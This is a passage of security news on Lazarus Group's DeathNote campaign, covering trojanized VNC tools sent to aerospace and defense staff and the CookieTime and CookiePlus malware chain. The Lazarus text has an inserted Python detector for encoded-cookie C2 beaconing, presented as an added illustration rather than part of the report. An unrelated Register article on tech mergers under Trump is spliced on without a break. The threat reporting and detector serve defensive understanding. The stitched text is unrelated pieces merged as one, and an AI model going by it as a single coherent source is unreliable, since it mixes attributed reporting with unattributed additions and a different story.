These activities often involve targeting developers and employees in various companies, including defense, aerospace, cryptocurrency, and other global sectors, with lucrative job opportunities that ultimately lead to the deployment of malware on their machines.

“Lazarus is interested in carrying out supply chain attacks as part of the DeathNote campaign, but this is mostly limited to two methods: the first is by sending a malicious document or trojanized PDF viewer that displays the tailored job descriptions to the target,” the Russian firm said in an exhaustive analysis.

“The second is by distributing trojanized remote access tools such as VNC or PuTTY to convince the targets to connect to a specific server for a skills assessment.”

The latest set of attacks documented by Kaspersky involve the second method, with the adversary making use of a completely revamped infection chain delivering a trojanized VNC utility under the pretext of conducting a skills assessment for IT positions at prominent aerospace and defense companies.

It’s worth noting that Lazarus Group’s use of rogue versions of VNC apps to target nuclear engineers was previously highlighted by the company in October 2023 in its APT trends report for Q3 2023.

“Lazarus delivered the first archive file to at least two people within the same organization (we’ll call them Host A and Host B),” researchers Vasily Berdnikov and Sojun Ryu said. “After a month, they attempted more intensive attacks against the first target.”

The VNC apps, a trojanized version of TightVNC called “AmazonVNC.exe,” are believed to have been distributed in the form of both ISO images and ZIP files. In other cases, a legitimate version of UltraVNC was used to sideload a malicious DLL packed within the ZIP archive.

The DLL (“vnclang.dll”) serves as a loader for a backdoor dubbed MISTPEN, which was uncovered by Google-owned Mandiant in September 2024; Mandiant tracks the activity cluster under the moniker UNC2970. MISTPEN, for its part, has been found to deliver two additional payloads codenamed RollMid and a new variant of LPEClient.

Kaspersky said it also observed the CookieTime malware being deployed on Host A, although the exact method that was used to facilitate it remains unknown. First discovered by the company in September and November 2020, CookieTime is so named for its use of encoded cookie values in HTTP requests to fetch instructions from a command-and-control (C2) server.
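As an added defensive illustration, not code from the Kaspersky report (which does not describe the cookie encoding here), the following Python flags the traffic pattern an encoded-cookie C2 channel of this kind would leave in proxy logs: one client repeatedly sending long, high-entropy, base64-like cookie values to the same host, with the value changing on each request. The log format, hosts and cookie values are constructed, and the length, entropy and repeat-count thresholds are assumptions to tune per environment.

```python
import math
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample proxy log lines in a hypothetical format:
#   "<timestamp> <client-ip> <method> <url> Cookie: <cookie-header>"
# 10.0.0.5 sends three requests to 203.0.113.10 with a different
# high-entropy "sid" value each time; the other lines are benign noise.
SAMPLE_LOG = """\
2024-03-01T10:00:01Z 10.0.0.5 GET http://203.0.113.10/index.php Cookie: sid=x7Qp9mLk2ZvB4nWc8RtY1eHs6GfJ3dAu5oIw0qMz9rTb
2024-03-01T10:00:02Z 10.0.0.5 GET https://www.example.com/ Cookie: lang=en-US; session=a1b2c3d4e5f6
2024-03-01T10:05:01Z 10.0.0.5 GET http://203.0.113.10/index.php Cookie: sid=Kd3vN8qWz1Xp6LmB4cRy7TfH0jSe2GaU9nIo5bVt8wYr
2024-03-01T10:07:30Z 10.0.0.7 GET https://cdn.example.net/app.js Cookie: tracking=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-03-01T10:10:01Z 10.0.0.5 GET http://203.0.113.10/index.php Cookie: sid=P2mX9kRw4Lq7vZn1bT6cF3jH8sYd0gAe5uI2oWq9rMt4
2024-03-01T10:12:00Z 10.0.0.7 GET https://api.example.org/v1 Cookie: token=R8tY2uI9oP1aS3dF5gH7jK0lZ4xC6vB8nM2qW5eR7tY9
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) Cookie: (.*)$")
# Standard or URL-safe base64 alphabet with optional padding (assumed encoding).
ENCODED_RE = re.compile(r"^[A-Za-z0-9+/_-]+={0,2}$")


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; random base64 of any length scores near 6."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_line(line: str):
    """Split one log line into client, host and a dict of cookie name -> value."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, client, _method, url, cookie_hdr = m.groups()
    cookies = {}
    for part in cookie_hdr.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return {"ts": ts, "client": client, "host": urlsplit(url).hostname, "cookies": cookies}


def looks_encoded(value: str, min_len: int = 32, min_entropy: float = 3.5) -> bool:
    """True when a cookie value is long, base64-like and high-entropy (thresholds assumed)."""
    return (len(value) >= min_len
            and bool(ENCODED_RE.match(value))
            and shannon_entropy(value) >= min_entropy)


def find_cookie_beacons(log_text: str, min_requests: int = 3):
    """Return ((client, host, cookie_name), distinct_value_count) for every
    client/host/cookie triple that carried at least `min_requests` distinct
    encoded-looking values. Requiring repetition with changing values keeps
    a single legitimate high-entropy session token from being flagged."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["cookies"].items():
            if looks_encoded(value):
                seen[(rec["client"], rec["host"], name)].add(value)
    return sorted((key, len(vals)) for key, vals in seen.items() if len(vals) >= min_requests)


if __name__ == "__main__":
    for (client, host, name), count in find_cookie_beacons(SAMPLE_LOG):
        print(f"{client} -> {host}: cookie '{name}' carried {count} distinct encoded values")
```

Run against the constructed log, only the 10.0.0.5 to 203.0.113.10 "sid" cookie is reported; the single high-entropy "token" sent once to api.example.org and the long but low-entropy "tracking" value are not. In a real environment the host should additionally be checked against allow-lists of known SaaS and CDN domains, since many legitimate services rotate opaque cookies.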

CookiePlus Malware

Further investigation of the attack chain has revealed that the threat actor moved laterally from Host A to another machine (Host C), where CookieTime was again used to drop various payloads between February and June 2024, as follows:

  • LPEClient, a malware that comes fitted with capabilities to profile compromised hosts
  • ServiceChanger, a malware that stops a targeted legitimate service so that the service’s executable can be used to side-load a rogue DLL embedded within the malware
  • Charamel Loader, a loader malware that decrypts and loads internal resources like CookieTime, CookiePlus, and ForestTiger
  • CookiePlus, a new plugin-based malicious program that’s loaded by both ServiceChanger and Charamel Loader

“The difference between each CookiePlus loaded by Charamel Loader and by ServiceChanger is the way it is executed. The former runs as a DLL alone and includes the C2 information in its resources section,” the researchers pointed out.

“The latter fetches what is stored in a separate external file like msado.inc, meaning that CookiePlus has the capability to get a C2 list from both an internal resource and an external file. Otherwise, the behavior is the same.”

CookiePlus gets its name from the fact that it was disguised as an open-source Notepad++ plugin called ComparePlus when it was detected in the wild for the first time. In the attacks targeting the nuclear-related entity, it has been found to be based on another project named DirectX-Wrappers.

The malware serves as a downloader to retrieve a Base64-encoded, RSA-encrypted payload from the C2 server, which is then decoded and deciphered to execute three different shellcodes or a DLL. The shellcodes are equipped with features to collect system information and make the main CookiePlus module sleep for a certain number of minutes.


It’s suspected that CookiePlus is a successor to MISTPEN owing to behavioral overlaps between the two malware families, including the aspect that both have disguised themselves as Notepad++ plugins.

“Throughout its history, the Lazarus group has used only a small number of modular malware frameworks such as Mata and Gopuram Loader,” Kaspersky said. “The fact that they do introduce new modular malware, such as CookiePlus, suggests that the group is constantly working to improve their arsenal and infection chains to evade detection by security products.”

The findings come as blockchain intelligence firm Chainalysis revealed that threat actors affiliated with North Korea have stolen $1.34 billion across 47 cryptocurrency hacks in 2024, up from $660.50 million in 2023. This included the May 2024 breach of Japanese cryptocurrency exchange DMM Bitcoin, which suffered a loss of $305 million at the time.

“Unfortunately, it appears that the DPRK’s crypto attacks are becoming more frequent,” the company said. “Notably, attacks between $50 and $100 million, and those above $100 million occurred far more frequently in 2024 than they did in 2023, suggesting that the DPRK is getting better and faster at massive exploits.”


Don’t expect massive M&A changes under Trump, say experts • The Register


Analysis When Donald Trump takes office for his second term on January 20, many expect sweeping changes across the board. But among tech players, when it comes to mergers and acquisitions, those hoping for looser regulations might be disappointed. 

Under the Biden administration, the perception of heightened regulatory scrutiny and antitrust enforcement has fueled dissatisfaction among the tech elite. Even some who supported Vice President Kamala Harris’s failed presidential bid wanted Chair Lina Khan out of the FTC.

“There’s been a lot of reporting done that the current FTC is, for lack of a better term, more aggressive in finding objections to proposed transactions that historically would not have faced the same degree of scrutiny,” Andrew Luh, partner and chair of M&A practice at Silicon Valley law firm Gunderson Dettmer, told The Register in an interview.

“There are a lot of high profile examples in the news about deals that are being challenged,” Luh added, referring to high-profile deals like Microsoft’s acquisition of Activision-Blizzard and other top-tier cases that Khan’s FTC has fought. “If you’re just using those types of [cases], the fact that some of those companies appear to be less favored under the current enforcement regime would have some chilling effect.”

Despite those high-profile antitrust cases, Luh said the pace hasn’t slowed down that much. 

“We, as a firm, will work on about 150 a year and we’re not a huge firm by any means,” Luh said. “So the aggregate tech M&A deal stats are still massive, even if you silo off [the most scrutinized deals].” 

There’s data to support that when it comes to large-scale deals. S&P Global put out a report on the M&A outlook under the second Trump administration shortly after the election that suggested, contrary to the perception of the Biden administration as a trust-busting, anti-acquisition administration, the total number of tech, media, and telecom (TMT) acquisitions valued over $500 million has actually been higher under Biden than under Trump’s first term.

As of the end of October 2024, there have been 235 $500M+ TMT M&As under Biden, and just 223 during Trump’s four years in office. Even with the added scrutiny, the median number of days it took to complete those M&As only rose by a single day under Biden – 77 days for the average deal compared to 76 under Trump.

Beyond that, PricewaterhouseCoopers (PwC) deals partner Lori Bistis told us, the years following the COVID-19 pandemic are going to look slow compared to the immediate aftermath of 2020.

Both 2021 and 2022 saw a huge rise in M&A activity in the tech sector and outside of it, Bistis and Luh noted. 

“You went from a level of dealmaking that was unprecedented to more normal numbers,” Bistis said. “If you look at it based on the last three or four years, dealmaking in 2023 was down in tech.” 

Bistis pointed to new merger guidelines issued by the Department of Justice and FTC in late 2023, as well as upcoming changes to premerger notification rules, set to take effect on February 10, as factors contributing to a slowdown in deal activity this year.

“There’s more effort that has to go into what you produce for the government and the regulatory agencies to get a deal done,” Bistis said. “Overall from a regulatory standpoint, there’s a lot more review going on.” 

Economic factors are at play, too

Bistis and Luh both mentioned that a slowdown in post-COVID M&A activity isn’t solely on the FTC and DoJ – there’s economics at work, too. 

“You’ll always see a slowdown in dealmaking during an election year just because that equates to uncertainty,” Bistis noted. High interest rates and geopolitical tensions are playing a role, she said. 

Those factors have led companies to explore alternatives to traditional M&A, which still involve significant dealmaking but often face fewer regulatory hurdles, Bistis noted. Divestitures and joint ventures are both hot right now, thanks in large part to economic challenges in the tech sector. 

“Historically for big tech, there hasn’t been much of a focus on divestitures, but I think we’ve seen that a bit more,” Bistis said. 


This is evident in the numerous layoffs, closures, and spinoffs we’ve seen in recent years. 

“If you think about the last couple of years, it’s been about a lot of restructuring in tech,” Bistis said – and that means “efficiency,” she noted. “Part of [restructuring] is usually looking at some non-core assets that maybe you can extract some value out of them sooner if you sell.” 

Khan’s legacy: Tougher M&As, Trump or not

Bistis said she expects the trend of divestitures and joint ventures to continue as Biden-era regulations come onto the books that make M&As a bigger hassle, and undoing those rules won’t be as easy as issuing an executive order.

As mentioned above, the new changes to the Hart-Scott-Rodino (HSR) premerger notification rules and forms are going to make it even more cumbersome to get an acquisition past the authorities.

According to FTC chair Khan, the new HSR forms include requirements for companies to report a lot of additional information. Submissions will need to include info on entities and individuals involved in deals that will have the ability to influence post-acquisition decision making, supply relationships that may undermine competition or rivals’ access to key products or services, information about products and services still under development that are not yet generating revenues, and details of certain prior acquisitions closed by both firms in the past five years to help regulators assess whether the transaction is part of an anticompetitive roll-up scheme.

The HSR updates and 2023 merger guidelines were both passed by the Commission on unanimous votes of 5-0 and 3-0, respectively. While the 2023 guidelines were voted on before Republican commissioners joined the Biden-era FTC, the new HSR rules were okayed by Democrats and Republicans alike – including Trump’s pick to head the FTC, Andrew Ferguson. 

While noting the new HSR rule “is not perfect, nor is it the rule I would have written if the decision were mine alone” in his concurring statement, Ferguson nonetheless voted to ratify it. 

“The additional information sought in the Final Rule is ‘necessary and appropriate,’” Ferguson opined. “Its benefits are many, and, by comparison, the added burdens are reasonable.”

Additionally, an FTC spokesperson pointed out to The Register that the new HSR rules haven’t resulted in a single lawsuit yet. This could suggest that companies have largely acquiesced to the new requirements.

The Trump transition team didn’t respond to questions for this story.

Cautious optimism among transition chaos

As we’ve noted in several stories covering the potential policies of the incoming Trump administration, there’s a lot of uncertainty swirling around Trump’s plans for his second term that’s led to the tech industry hitting the brakes on big changes. Things are largely the same in the M&A world right now. 


Both Luh and Bistis said their clients have been operating under a “wait and see” mindset, with Luh in particular saying that most businesses are just trying to wrap up year-end matters rather than thinking about 2025 acquisition plans. 

Bistis, on the other hand, said that the people she’s been speaking with are excited that the M&A process might become a little simpler: Even if the paperwork isn’t going away, regulators might take a more hands-off approach. 

“I think as compared to the regulatory trends we’ve seen over the last several years, I think it’s a cautious optimism,” Bistis said. “The benchmark over the last four years was pretty tough.” 

That said, anyone in the tech space who’s preparing to get the deal motor running come Trump’s inauguration would do well to get their house in order, Bistis told us, pointing to a number of suggestions PwC publishes for TMT firms.

“Focus on collecting the data now that you need to respond to said regulatory increases,” Bistis suggested. “You never want to be the hold up.”

“There’s a lot to be done – especially with these new HSR requirements coming out,” the PwC advisor said – and those rules are unlikely to vanish before Trump takes office. “The more [you] can get ahead of that, if you’re preparing to do an M&A, the better.”
